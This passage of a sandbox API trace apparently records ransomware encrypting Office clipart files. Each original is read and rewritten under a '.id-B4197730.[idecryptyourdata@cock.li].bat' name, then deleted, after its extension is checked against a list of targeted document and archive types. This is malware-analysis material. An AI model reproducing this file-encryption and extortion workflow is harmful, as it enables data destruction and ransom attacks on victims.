CloseHandle (hObject=0x334) returned 1 [0198.102] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.102] SetEndOfFile (hFile=0x390) returned 1 [0198.103] CloseHandle (hObject=0x390) returned 1 [0198.103] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.104] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183574.wmf")) returned 1 [0198.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF") returned 68 [0198.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF") returned 68 [0198.104] lstrlenW (lpString=".doc") returned 4 [0198.105] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.105] lstrlenW (lpString=".docx") returned 5 [0198.105] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0198.105] lstrlenW (lpString=".pdf") returned 4 [0198.105] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.105] lstrlenW (lpString=".xls") returned 4 [0198.105] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.105] lstrlenW (lpString=".xlsx") returned 5 [0198.105] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0198.105] lstrlenW (lpString=".ppt") returned 4 [0198.105] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF") returned 68 [0198.105] lstrlenW (lpString=".zip") returned 4 [0198.105] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.105] lstrlenW (lpString=".rar") returned 4 [0198.105] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.105] lstrlenW (lpString=".bz2") returned 4 [0198.105] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.105] lstrlenW (lpString=".7z") returned 3 [0198.105] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF") returned 68 [0198.105] lstrlenW (lpString=".dbf") returned 4 [0198.105] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF") returned 68 [0198.105] lstrlenW (lpString=".1cd") returned 4 [0198.105] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF") returned 68 [0198.105] lstrlenW (lpString=".jpg") returned 4 [0198.105] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.106] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.106] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185670.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0198.107] GetLastError () returned 0x0 [0198.107] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x1c88, lpOverlapped=0x0) returned 1 [0198.111] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x1c90, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x1c90, lpOverlapped=0x0) returned 1 [0198.112] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.112] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.112] SetEndOfFile (hFile=0x334) returned 1 [0198.112] CloseHandle (hObject=0x334) returned 1 [0198.112] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.112] SetEndOfFile (hFile=0x390) returned 1 [0198.113] CloseHandle (hObject=0x390) returned 1 [0198.113] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.114] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185670.wmf")) returned 1 [0198.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF") returned 68 [0198.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF") returned 68 [0198.114] lstrlenW (lpString=".doc") returned 4 [0198.114] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.115] lstrlenW (lpString=".docx") returned 5 [0198.115] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0198.115] lstrlenW (lpString=".pdf") returned 4 [0198.115] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.115] lstrlenW (lpString=".xls") returned 4 [0198.115] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.115] lstrlenW (lpString=".xlsx") returned 5 [0198.115] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0198.115] lstrlenW (lpString=".ppt") returned 4 [0198.115] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF") returned 68 [0198.115] lstrlenW (lpString=".zip") returned 4 [0198.115] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.115] lstrlenW (lpString=".rar") returned 4 [0198.115] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.115] lstrlenW (lpString=".bz2") returned 4 [0198.115] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.115] lstrlenW (lpString=".7z") returned 3 [0198.115] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF") returned 68 [0198.115] lstrlenW (lpString=".dbf") returned 4 [0198.115] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF") returned 68 [0198.115] lstrlenW (lpString=".1cd") returned 4 [0198.115] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF") returned 68 [0198.115] lstrlenW (lpString=".jpg") returned 4 [0198.115] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.116] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.116] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185774.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0198.117] GetLastError () returned 0x0 [0198.117] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x4e46, lpOverlapped=0x0) returned 1 [0198.316] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x4e50, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x4e50, lpOverlapped=0x0) returned 1 [0198.318] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.318] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.318] SetEndOfFile (hFile=0x334) returned 1 [0198.318] CloseHandle (hObject=0x334) returned 1 [0198.318] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.318] SetEndOfFile (hFile=0x390) returned 1 [0198.319] CloseHandle (hObject=0x390) returned 1 [0198.319] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.320] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185774.wmf")) returned 1 [0198.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF") returned 68 [0198.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF") returned 68 [0198.320] lstrlenW (lpString=".doc") returned 4 [0198.320] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.320] lstrlenW (lpString=".docx") returned 5 [0198.320] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0198.320] lstrlenW (lpString=".pdf") returned 4 [0198.321] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.321] lstrlenW (lpString=".xls") returned 4 [0198.321] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.321] lstrlenW (lpString=".xlsx") returned 5 [0198.321] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0198.321] lstrlenW (lpString=".ppt") returned 4 [0198.321] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF") returned 68 [0198.321] lstrlenW (lpString=".zip") returned 4 [0198.321] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.321] lstrlenW (lpString=".rar") returned 4 [0198.321] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.321] lstrlenW (lpString=".bz2") returned 4 [0198.321] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.321] lstrlenW (lpString=".7z") returned 3 [0198.321] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF") returned 68 [0198.321] lstrlenW (lpString=".dbf") returned 4 [0198.321] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF") returned 68 [0198.321] lstrlenW (lpString=".1cd") returned 4 [0198.321] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF") returned 68 [0198.321] lstrlenW (lpString=".jpg") returned 4 [0198.321] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.322] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.322] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185842.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0198.323] GetLastError () returned 0x0 [0198.323] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x37e4, lpOverlapped=0x0) returned 1 [0198.325] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x37f0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x37f0, lpOverlapped=0x0) returned 1 [0198.326] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.326] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.326] SetEndOfFile (hFile=0x334) returned 1 [0198.326] CloseHandle (hObject=0x334) returned 1 [0198.326] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.326] SetEndOfFile (hFile=0x390) returned 1 [0198.327] CloseHandle (hObject=0x390) returned 1 [0198.327] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.328] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185842.wmf")) returned 1 [0198.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF") returned 68 [0198.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF") returned 68 [0198.328] lstrlenW (lpString=".doc") returned 4 [0198.328] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.328] lstrlenW (lpString=".docx") returned 5 [0198.328] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0198.329] lstrlenW (lpString=".pdf") returned 4 [0198.329] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.329] lstrlenW (lpString=".xls") returned 4 [0198.329] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.329] lstrlenW (lpString=".xlsx") returned 5 [0198.329] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0198.329] lstrlenW (lpString=".ppt") returned 4 [0198.329] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF") returned 68 [0198.329] lstrlenW (lpString=".zip") returned 4 [0198.329] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.329] lstrlenW (lpString=".rar") returned 4 [0198.329] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.329] lstrlenW (lpString=".bz2") returned 4 [0198.329] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.329] lstrlenW (lpString=".7z") returned 3 [0198.329] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF") returned 68 [0198.329] lstrlenW (lpString=".dbf") returned 4 [0198.329] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF") returned 68 [0198.329] lstrlenW (lpString=".1cd") returned 4 [0198.329] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF") returned 68 [0198.329] lstrlenW (lpString=".jpg") returned 4 [0198.329] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.330] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.330] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186346.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0198.331] GetLastError () returned 0x0 [0198.331] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x21da, lpOverlapped=0x0) returned 1 [0198.333] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x21e0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x21e0, lpOverlapped=0x0) returned 1 [0198.334] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.334] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.334] SetEndOfFile (hFile=0x334) returned 1 [0198.334] CloseHandle (hObject=0x334) returned 1 [0198.335] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.335] SetEndOfFile (hFile=0x390) returned 1 [0198.335] CloseHandle (hObject=0x390) returned 1 [0198.336] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.336] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186346.wmf")) returned 1 [0198.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF") returned 68 [0198.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF") returned 68 [0198.337] lstrlenW (lpString=".doc") returned 4 [0198.337] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.337] lstrlenW (lpString=".docx") returned 5 [0198.337] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0198.337] lstrlenW (lpString=".pdf") returned 4 [0198.337] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.337] lstrlenW (lpString=".xls") returned 4 [0198.337] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.337] lstrlenW (lpString=".xlsx") returned 5 [0198.337] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0198.337] lstrlenW (lpString=".ppt") returned 4 [0198.337] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF") returned 68 [0198.337] lstrlenW (lpString=".zip") returned 4 [0198.337] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.338] lstrlenW (lpString=".rar") returned 4 [0198.338] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.338] lstrlenW (lpString=".bz2") returned 4 [0198.338] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.338] lstrlenW (lpString=".7z") returned 3 [0198.338] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF") returned 68 [0198.338] lstrlenW (lpString=".dbf") returned 4 [0198.338] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF") returned 68 [0198.338] lstrlenW (lpString=".1cd") returned 4 [0198.338] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF") returned 68 [0198.338] lstrlenW (lpString=".jpg") returned 4 [0198.338] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.338] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.338] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186360.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0198.339] GetLastError () returned 0x0 [0198.339] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x843a, lpOverlapped=0x0) returned 1 [0198.342] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x8440, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x8440, lpOverlapped=0x0) returned 1 [0198.343] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.344] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.344] SetEndOfFile (hFile=0x334) returned 1 [0198.344] CloseHandle (hObject=0x334) returned 1 [0198.344] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.344] SetEndOfFile (hFile=0x390) returned 1 [0198.345] CloseHandle (hObject=0x390) returned 1 [0198.345] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.346] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186360.wmf")) returned 1 [0198.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF") returned 68 [0198.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF") returned 68 [0198.346] lstrlenW (lpString=".doc") returned 4 [0198.346] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.346] lstrlenW (lpString=".docx") returned 5 [0198.346] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0198.346] lstrlenW (lpString=".pdf") returned 4 [0198.346] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.346] lstrlenW (lpString=".xls") returned 4 [0198.346] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.346] lstrlenW (lpString=".xlsx") returned 5 [0198.346] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0198.347] lstrlenW (lpString=".ppt") returned 4 [0198.347] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF") returned 68 [0198.347] lstrlenW (lpString=".zip") returned 4 [0198.347] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.347] lstrlenW (lpString=".rar") returned 4 [0198.347] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.347] lstrlenW 